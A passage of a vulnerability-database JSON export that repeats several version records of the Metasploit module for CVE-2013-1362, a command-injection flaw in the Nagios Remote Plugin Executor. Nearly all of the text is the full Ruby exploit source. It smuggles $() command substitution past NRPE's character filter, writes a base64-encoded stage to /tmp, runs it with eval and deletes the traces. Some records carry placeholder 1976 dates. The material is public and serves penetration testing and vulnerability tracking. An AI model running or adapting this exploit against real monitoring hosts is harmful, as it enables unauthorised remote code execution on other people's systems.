(popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T07:17:10", "differentElements": ["modified", "published"], "edition": 82}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T09:02:37", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T09:02:37", "differentElements": ["modified", "published"], "edition": 83}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-12T15:33:47", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-12T15:33:47", "differentElements": ["modified", "published"], "edition": 84}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-12T19:29:06", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-12T19:29:06", "differentElements": ["modified", "published"], "edition": 85}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-19T09:26:25", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-19T09:26:25", "differentElements": ["modified", "published"], "edition": 86}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
